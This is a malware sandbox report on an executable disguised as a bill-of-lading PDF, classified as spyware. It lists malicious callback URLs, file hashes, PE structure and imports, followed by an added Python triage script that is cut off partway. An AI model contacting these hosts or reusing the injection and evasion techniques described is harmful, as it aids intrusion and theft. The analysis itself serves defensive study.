            http://www.ly0.xyz/vshw/?Qzj=EspU2mytRZKz4auAzVKL1tfZdJmh9evbelDltaue1VIW4sYIVCILyk3Sg5ScN2hRjv7eCPLeVYxJkFe87LUrFuvYQ7vdzmgwzIu85Xz/vDtptw9jh7A1S+4=&Znyl=2rnxDB | true | | unknown
            http://www.awesomearv.buzz/53bw/ | true | | unknown
            http://www.mjcregionsud.org/r61b/ | true | | unknown
            http://www.d81dp.top/9m01/?Qzj=YTEnPXeuvLCqp8pRYoqPCdBwzXmtEoIu3aiFszfHZiHCethv0UoX0rXDgO0m0L5Zay3qgh7+EeCD2cfEa0kxYtbLgo4/0RqeWSM2Ph2v0Riv4xOBN3dU33Q=&Znyl=2rnxDB | true | | unknown
            http://www.ly0.xyz/vshw/ | true | | unknown
            http://www.030002252.xyz/2ncs/ | true | | unknown
            http://www.heeraka.info/o7wc/?Qzj=noDrsAMitbMGukbGKwTOr3sYcBr23H5ivpvnAiMvw1nUlPzFIxH7oxZbrZBuy0eo4pgag2ycYt5GuEsaJdfqIMS3tV1Dx9iQIhSiX0wNT38Z12lUBSmDrQk=&Znyl=2rnxDB | true | | unknown
            http://www.academyinmotion.xyz/63ck/?Znyl=2rnxDB&Qzj=GQYraOg50FzHvWxTy9J2g/Ct8yJZYLUl1pszYO6BquwY8zCRfPuOPPLv6opwWQ+1qa0YVJN1ZlZd4AL6pjVc8tqy3KaAjtZyQfx4UTLqHu607EYV+xyRwE8= | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://duckduckgo.com/chrome_newtab | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/ac/?q= | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://http.gn301.com:12345/?u= | write.exe, 00000006.00000002.4199021096.000000000555C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.00000000036EC000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
            http://www.barbequecritics.com | gNKNuXuipEBZec.exe, 00000007.00000002.4200186991.000000000517C000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
            https://www.ecosia.org/newtab/ | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA | write.exe, 00000006.00000002.4199021096.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000004058000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
            https://ac.ecosia.org/autocomplete?q= | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.dzyngiri.com | write.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://justinmezzell.com | write.exe, 00000006.00000002.4199021096.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000003D34000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | write.exe, 00000006.00000003.2378455936.000000000764E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540748
Start date and time: 2024-10-24 05:05:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Bill Of Lading_MEDUVB935991.pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@14/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 39
• Number of non-executed functions: 320
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for currently running targets with high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target gNKNuXuipEBZec.exe, PID 4624 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time: 23:07:28
Type: API Interceptor
Description: 10363784x Sleep call for process: write.exe modified
                                                                                                                    • 185.90.96.91
                                                                                                                    94VG.armGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.90.96.30
                                                                                                                    6YDlqbb66nGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.90.96.94
                                                                                                                    No context
                                                                                                                    No context
Process: C:\Windows\SysWOW64\write.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
File Type: data
Category: dropped
Size (bytes): 288256
Entropy (8bit): 7.994903670155084
Encrypted: true
SSDEEP: 6144:oJw2y6fqUCmy48kV7ogOxoq4v9DLLwhqrHPkqSQPznSAaQrxAgp/Ps:oJw/689kV7JJq41DfwIHPvPzMQrx/Ps
MD5: 32C4A005796C1328754BB8682BEA8FAB
SHA1: 370F9AD77344606F36DAE8123AAB7C49B477B9BB
SHA-256: 3FFDB826ADECD2C23EB57265A0EBF086A1B16E43917301C67BF0E6A3CF585C7A
SHA-512: A08380BEF3EF67C342EBE3820E3D04300324E789747ED127E618161DB7030129D43696E43EC9A8F0D596F2F98D1E971870204121F9AD83AE24C69AEFE06B8497
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.511608858394749
TrID:
• Win32 Executable (generic) a (10002005/4) 95.11%
• AutoIt3 compiled script executable (510682/80) 4.86%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Bill Of Lading_MEDUVB935991.pdf.exe
File size: 1'326'841 bytes
MD5: 0b14ab0ac2f8e44d3f3cfd8fcdbe6d30
SHA1: 15d07797ac7d44d65eb44b00fcaa3c5decd840da
SHA256: fee2d4f0f34f90653abf9827d99da2fc9670fb10e83dbf008cd447ca86e5c418
SHA512: 37f3a88d61c11aa28a50eef23ff25608a30655fd1e417122bbf78f33f9ad82d97b1ba833e40774a18a3a6094b316571e0018bd6157b4da3c1c6ad0353c347bb7
SSDEEP: 24576:ffmMv6Ckr7Mny5QLZHBYbvqe0MD4z630Xh6BZfQCJWqL3yvMqf:f3v+7/5QLZhYbJiXh6vfXrMf
TLSH: 6F55F112B7D680B6DDA339B1293BE327AB35B5194333C4CBA7E02F769E111405B3A761
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
Icon Hash: 1733312925935517
Entrypoint: 0x416310
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: aaaa8913c89c8aa4a5d93f06853894da
Instruction
call 00007F89ECEAA2DCh
jmp 00007F89ECE9E0AEh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F89ECE9E23Ah
cmp edi, eax
jc 00007F89ECE9E3DAh
cmp ecx, 00000100h
jc 00007F89ECE9E251h
cmp dword ptr [004A94E0h], 00000000h
je 00007F89ECE9E248h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F89ECE9E23Ah
pop esi
pop edi
pop ebp
jmp 00007F89ECE9E69Ah
test edi, 00000003h
jne 00007F89ECE9E247h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F89ECE9E25Ch
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F89ECE9E23Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F89ECE9E1FEh
Programming Language:
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
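The import table above is the static API surface of the dropper, and it lines up with several of the report's signatures (writes to foreign memory regions, process enumeration, debugger checks, clipboard and keyboard access). What it does not show is equally useful: OpenProcess, VirtualAllocEx and WriteProcessMemory are imported, but none of the usual injection finishers (CreateRemoteThread, SetThreadContext, QueueUserAPC, NtQueueApcThread) are, which is what you expect when the later stages resolve APIs at runtime or issue syscalls directly, as the report's "Found direct / indirect Syscall" and APC-injection signatures indicate. The Python below is an added triage example, not code from the Joe Sandbox report or from the sample: it parses rows in the flattened form shown above, groups imported names into capability clusters (the cluster names and membership are my own choice, not a Joe Sandbox taxonomy), and classifies the injection surface. The embedded rows are an excerpt of the table above, shortened to the entries used here.

```python
import re

# Excerpt of the report's import table, copied in the flattened form the
# extracted page uses ("<dll><import>, <import>, ..."). Rows were shortened
# to the entries relevant here; every name below is in the report's table.
IMPORT_TABLE_EXCERPT = [
    "WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, WSAStartup, bind, closesocket, connect, socket, send, gethostbyname, recv",
    "WININET.dllInternetReadFile, InternetOpenW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, InternetOpenUrlW",
    "PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules",
    "KERNEL32.dllHeapAlloc, Sleep, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OutputDebugStringW, CreateProcessW, CreateThread, GetProcAddress, LoadLibraryA, LoadLibraryW, LoadLibraryExW, IsDebuggerPresent, ResumeThread, GetTickCount",
    "USER32.dllGetAsyncKeyState, GetKeyboardState, GetKeyState, GetClipboardData, OpenClipboard, BlockInput, SendInput, keybd_event, mouse_event, AttachThreadInput",
    "ADVAPI32.dllAdjustTokenPrivileges, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, LogonUserW, GetTokenInformation",
]

# A flattened row is "<module>.dll" (any case) immediately followed by the list.
ROW_RE = re.compile(r"^(?P<dll>[A-Za-z0-9_\-]+\.dll)(?P<imports>.*)$", re.IGNORECASE)

# Clusters of Win32 APIs keyed by the behaviour they enable. The labels and
# membership are my own (assumption), chosen to echo the report's signatures.
CAPABILITY_CLUSTERS = {
    "cross-process memory write": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory", "VirtualFreeEx"},
    "injection finisher (thread start / context / APC)": {"CreateRemoteThread", "SetThreadContext", "QueueUserAPC", "NtQueueApcThread", "ResumeThread"},
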